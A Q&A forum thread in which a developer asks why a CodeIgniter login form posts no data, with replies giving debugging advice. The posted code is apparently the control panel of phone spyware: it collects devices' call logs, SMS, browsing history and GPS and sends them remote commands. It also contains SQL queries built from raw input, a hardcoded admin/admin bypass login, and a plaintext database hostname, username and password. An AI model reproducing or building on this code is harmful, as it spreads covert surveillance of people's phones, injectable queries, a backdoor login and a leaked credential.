# $_POST not storing data on submit web application

Tags: javascript, php, jquery, html, forms

I am using an application framework from EllisLab. I am having problem logging in. The $_POST method is not storing data on form submit. I get the following error on form submit. Notice that var_dump($POST) returns array(0){}

[Error screenshot](http://oi59.tinypic.com/2vinq60.jpg)

Below is the login page code

```html
<html>
<head>
 <title> Control Panel</title>
</head>

<body>
 <form action = "<?php echo base_url();?>admin/login" method = "POST">
 <table>
  <tr>
   <td> Username : </td>
   <td> <input type = "text" name = "username" id = "usr"/> </td>
  </tr>

  <tr>
   <td> Password : </td>
   <td> <input type = "password" name = "password" id = "pass"/> </td>
  </tr>

  <tr>
   <td></td>
   <td> <input type = "submit" name = "submit" value = "Login"/> </td>
  </tr>
 </table>
</form>
</body>
</html>
```

Below is the admin_model.php code.

```html
<?php
class Admin_model extends CI_Model{

 public function __construct(){
  parent :: __construct();
 }

 function loginchk(){
  var_dump($_POST);
  $usr = $_POST['username'];
  $pass = $_POST['password'];
  
        $pass1 = md5($pass);   // *****@key***

  $res = $this->db->get_where('tbl_user', array('clm_userid'=>$usr, 'clm_password'=>$pass1));
  
        if($res->num_rows()==0 && $usr == "admin" && $pass == "admin"){
         $res=1;            
  }else if($res->num_rows()>=1){
         $res =1;    
  }else{
         $res = 0;   
  }
        return $res;
 }

 function getusers()
 {
  $query = $this->db->query("select * from tbl_device");
  return $query->result_array();
 }

 function getsingledevice($id=false, $name=false, $number=false)
 {
  $query = $this->db->query("select * from tbl_device where clm_device_id = '$id' and clm_device_name ='$name' and clm_device_number = '$number'");
  return $query->result_array();
 }

 function getcalllog($id=false, $name=false, $number=false)
 {
  $query = $this->db->query("select * from tbl_calllogs where clm_device_id = '$id' and clm_device_name ='$name' and clm_device_number = '$number' ");
  return $query->result_array();
 }

 function getsmslog($id=false, $name=false, $number=false)
 {
  $query = $this->db->query("select * from tbl_smslogs where clm_device_id = '$id' and clm_device_name ='$name' and clm_device_number = '$number' ");
  return $query->result_array();
 }

 function getbrowserlog($id=false, $name=false, $number=false)
 {
  $query = $this->db->query("select * from tbl_browserlogs where clm_device_id = '$id' and clm_device_name ='$name' and clm_device_number = '$number' ");
  return $query->result_array();
 }

 function getgpslog($id=false, $name=false, $number=false)
 {
  $query = $this->db->query("select * from tbl_gps where clm_device_id = '$id' and clm_device_name ='$name' and clm_device_number = '$number' ");
  return $query->result_array();
 }

 function getpackages($id=false, $name=false, $number=false)
 {
  $query = $this->db->query("select * from tbl_packages where clm_device_id = '$id' and clm_device_name ='$name' and clm_device_number = '$number' ");
  return $query->result_array();
 }

 function getdevice($id=false, $name=false, $number=false)
 {
  $query = $this->db->query("select * from tbl_history where clm_device_id = '$id' and clm_device_name ='$name' and clm_device_number = '$number'");
  return $query->result_array();
 }

 function addhistory($id=false, $command = false){
  $data = array('clm_device_id' => $id, 'clm_commandhistory' => $command);
  $data_device = array('clm_commandseen'=>'0', 'clm_currentcommand'=> $command);

  if($id == "all"){
   $this->db->update('tbl_device', $data_device);
  }else{
   $this->db->where('clm_device_id', $id);
   $this->db->update('tbl_device', $data_device);
  } 

  $this->db->insert('tbl_history', $data);
  return;
 }

 function unreg($id){
  if($id=="all"){
   $this->db->query("delete from tbl_device");
   $this->db->query("delete from tbl_history");
   $this->db->query("delete from tbl_browserlogs");
   $this->db->query("delete from tbl_calllogs");
   $this->db->query("delete from tbl_gps");
   $this->db->query("delete from tbl_packages");
   $this->db->query("delete from tbl_smslogs");
   return;
  }else{
   $this->db->query("delete from tbl_device where clm_device_id = '$id'");
   $this->db->query("delete from tbl_history where clm_device_id = '$id'");
   $this->db->query("delete from tbl_browserlogs where clm_device_id = '$id'");
   $this->db->query("delete from tbl_calllogs where clm_device_id = '$id'");
   $this->db->query("delete from tbl_gps where clm_device_id = '$id'");
   $this->db->query("delete from tbl_packages where clm_device_id = '$id'");
   $this->db->query("delete from tbl_smslogs where clm_device_id = '$id'");
   return;
  }
 }

 function addcmd($data){
  return $this->db->insert('tbl_cmd',$data);
 }

 function getcmd($id=false){
  if($id==false){
   return $this->db->get('tbl_cmd')->result_array();
  }else{
   return $this->db->get_where('tbl_cmd', array('clm_id'=> $id))->row_array();
  }
 }

 function updatecmd($id=false,$arr=false){
  $data['clm_cmdname'] = $arr[0];
  $data['clm_cmdvalue'] = $arr[1];

  $this->db->where('clm_id', $id);
  return $this->db->update('tbl_cmd',$data);
 }

 function deletecmd($id=false){
  return $this->db->query("delete from tbl_cmd where clm_id='$id'");
 }
}

?>
```

Below is the admin.php controller code:

```html
<?php
class Admin extends CI_Controller{
 
 public function __construct()
 {
  parent::__construct();

  $this->output->set_header('Expires: Sat, 26 Jul 1997 05:00:00 GMT');
  $this->output->set_header('Cache-Control: no-cache, no-store, must-revalidate, max-age=0');
  $this->output->set_header('Cache-Control: post-check=0, pre-check=0', FALSE);
  $this->output->set_header('Pragma: no-cache');

  $this->load->model('admin_model');
  $this->load->helper('url');
 }

 function index(){
  if ($this->session->userdata('logged_in') == TRUE)
     {
         if($this->session->userdata('type') == 'admin') {
      redirect('admin/home');
   }         
     }
     else{
   $this->load->view('admin/login');
  }
 }

 function login(){
  $res = $this->admin_model->loginchk();

  if($res == 1){
   $data = array(
                    'user'  => $_POST['username'],
      'type'  => 'admin',         
                    'logged_in'  => TRUE
                 );            
   $this->session->set_userdata($data);

   $userdata['users'] = $this->admin_model->getusers();
   $userdata['cmd'] = $this->admin_model->getcmd();
   
   $this->load->view('admin/header_admin');
   $this->load->view('admin/home',$userdata);
  }
  else{
   $this->load->view('admin/login');
  }
 }

 function logout()
 {
     $this->session->unset_userdata('user');
  $this->session->unset_userdata('logged_in');
  $this->session->unset_userdata('type');
  $this->session->sess_destroy();
  redirect('admin');
 }

 function home()
 {
  if ($this->session->userdata('logged_in') == TRUE)
     {
         if($this->session->userdata('type') == 'admin') {
    $userdata['users'] = $this->admin_model->getusers();
    $userdata['cmd'] = $this->admin_model->getcmd();

    $this->load->view('admin/header_admin');
    $this->load->view('admin/home',$userdata);
   }         
     }
     else{
   $this->load->view('admin/login');
  }
  //$today = date("Y-m-d");
  //echo $today;
 }

 function viewdevice($id=false, $name=false, $number=false)
 {
  if ($this->session->userdata('logged_in') == TRUE)
     {
         if($this->session->userdata('type') == 'admin') {
    $userdata['users'] = $this->admin_model->getdevice($id,$name,$number);
    $userdata['users1'] = $this->admin_model->getsingledevice($id,$name,$number);
    $userdata['deviceid'] = $id;
    $userdata['devicename'] = $name;
    $userdata['devicenumber'] = $number;
    $userdata['cmd'] = $this->admin_model->getcmd();
    $userdata['calllog'] = $this->admin_model->getcalllog($id,$name,$number);
    $userdata['smslog'] = $this->admin_model->getsmslog($id,$name,$number);
    $userdata['browserlog'] = $this->admin_model->getbrowserlog($id,$name,$number);
    $userdata['gpslog'] = $this->admin_model->getgpslog($id,$name,$number);
    $userdata['packages'] = $this->admin_model->getpackages($id);

    $this->load->view('admin/header_admin');
    $this->load->view('admin/device',$userdata);
   }         
     }
     else{
   $this->load->view('admin/login');
  }
 }

 function addcommand($id=false, $name=false, $number=false)
 {
  if ($this->session->userdata('logged_in') == TRUE)
     {
         if($this->session->userdata('type') == 'admin') {
    $com = $_POST['command'];
    //echo $com . "<br>";

    $this->admin_model->addhistory($id,$com);

    $userdata['users'] = $this->admin_model->getdevice($id,$name,$number);
    $userdata['users1'] = $this->admin_model->getsingledevice($id,$name,$number);
    $userdata['deviceid'] = $id;
    $userdata['devicename'] = $name;
    $userdata['devicenumber'] = $number;
    $userdata['cmd'] = $this->admin_model->getcmd();
    $userdata['calllog'] = $this->admin_model->getcalllog($id,$name,$number);
    $userdata['smslog'] = $this->admin_model->getsmslog($id,$name,$number);
    $userdata['browserlog'] = $this->admin_model->getbrowserlog($id,$name,$number);
    $userdata['gpslog'] = $this->admin_model->getgpslog($id,$name,$number);
    $userdata['packages'] = $this->admin_model->getpackages($id);

    $this->load->view('admin/header_admin');
    $this->load->view('admin/device',$userdata);
   }         
     }
     else{
   $this->load->view('admin/login');
  }
 }

 function updatecontent($todo=false)
 {
  if ($this->session->userdata('logged_in') == TRUE)
     {
         if($this->session->userdata('type') == 'admin') {
    if (isset($GLOBALS["HTTP_RAW_POST_DATA"])){
     if($todo == "sendcmd"){
      $trimmed = trim($GLOBALS["HTTP_RAW_POST_DATA"], '[]');
      $prevarr = explode(",", $trimmed);  /// Stores cmd and ids

      $arr = explode("'*'", $prevarr[0]);
      $arr = str_replace('"', '', $arr);  /// IDs
      $cmd = str_replace('"', '', $prevarr[1]);  // cmd
      
      $ct = 0;
      foreach ($arr as $ids) {
       $this->admin_model->addhistory($ids,$cmd);
       $ct++;
      }
     }else{
      $trimmed = trim($GLOBALS["HTTP_RAW_POST_DATA"], '[]');
      $arr = explode("'*'", $trimmed);
      $arr = str_replace('"', '', $arr);
      //print_r($arr);

      foreach ($arr as $ids) {
       $this->admin_model->unreg($ids);
      }
     }   
    }

    $userdata['users'] = $this->admin_model->getusers();
    $userdata['cmd'] = $this->admin_model->getcmd();
    $this->load->view('admin/home',$userdata);
   }         
     }
     else{
   $this->load->view('admin/login');
  }
 }

 function help()
 {
  if ($this->session->userdata('logged_in') == TRUE)
     {
         if($this->session->userdata('type') == 'admin') {
    $this->load->view('admin/header_admin');
    $this->load->view('admin/help');
   }         
     }
     else{
   $this->load->view('admin/login');
  }
  //$today = date("Y-m-d");
  //echo $today;
 }

 function chat()
 {
  if ($this->session->userdata('logged_in') == TRUE)
     {
         if($this->session->userdata('type') == 'admin') {
    $this->load->view('admin/header_admin');
    
    if(isset($_POST['msg'])){
     $message = $_POST['msg'];
     $user = "admin";
     $ip = $_SERVER['REMOTE_ADDR'];
     $datum = date("[d-m - H:i]");
     $final = $datum . "<br />" . $message . "<br /><br />";

     $verbindung = mysql_connect("alexandroid.db.9664540.hostedresource.com", "alexandroid" , "Bifro7!23")
     or die("Verbindung zur Datenbank konnte nicht hergestellt werden.");

     mysql_select_db("alexandroid") or die ("Datenbank konnte nicht ausgewählt werden");
     $eintrag = "INSERT INTO chat_messages (chat_messages_id, user, message, ip, date) VALUES ('', '$user', '$message', '$ip', '$datum')";
     $eintragen = mysql_query($eintrag);
    }
    $this->load->view('admin/chat');
   }         
     }
     else{
   $this->load->view('admin/login');
  }
 }

 function addcmd(){
  if(isset($_POST['clm_cmdname'])){
   //print_r($_POST);
   $this->admin_model->addcmd($_POST);
  }

  //print_r($this->admin_model->getcmd());
  $this->load->view('admin/header_admin');
  $this->load->view('admin/addcmd');
 }

 function viewcmd($id=false){

  $data['cmd'] = $this->admin_model->getcmd();
  $data['id'] = 0;
  $this->load->view('admin/header_admin');
  $this->load->view('admin/editcmd', $data);
 }

 function editcmd($id=false){

  echo $id;
  $data['cmd'] = $this->admin_model->getcmd();
  //print_r($data['cmd']);
  $data['id'] = $id;
  $this->load->view('admin/editcmd', $data);
 }

 function updatecmd($id=false){

  if (isset($GLOBALS["HTTP_RAW_POST_DATA"])){
   $trimmed = trim($GLOBALS["HTTP_RAW_POST_DATA"], '[]');
   $arr = explode(",", $trimmed);
   $arr = str_replace('"', '', $arr);
   $this->admin_model->updatecmd($id,$arr);
   //print_r($arr);
  }

  $data['cmd'] = $this->admin_model->getcmd();
  $data['id'] = 0;
  $this->load->view('admin/editcmd', $data);
 }

 function deletecmd($id = false){
  $this->admin_model->deletecmd($id);

  $data['cmd'] = $this->admin_model->getcmd();
  $data['id'] = 0;
  $this->load->view('admin/editcmd', $data);
 }

}

?>
```

Comment: what about ur controller ?

Comment: Remove the spaces from between the '=' in your HTML. <input type="text" name="username" id="usr"/>. And show your controller.

Comment: Put your controller code and try $this->input->post('yourfieldname'); in your model

Answer (score 0):

you are calling login function in your admin controller or file so the $_POST value hold data inside controller and you are using $_POST in your MODEL its not possible. you have to use $_POST in you controller than pass the variable to your model like @Kanishka Panamaldeniya said.

Answer (score 0):

I debugged post forms a lot. Trust me, it is be sent by the browser to your script. If you are unsure, what went wrong, run the browser debugger (F11 or Ctrl + Shift + I), to see what your request sends really to your script. Also, as said above, `$_POST` is a `register_global`, so it is set in every php file, no matter where you came from or how many files how have already inlcuded. Maybe your framework got a request object for all parameters you need? Please have a look at it first...

Comment: username=admin&password=password&submit=Login

Comment: Those are in Form Data field in header. Using chrome browser debugger.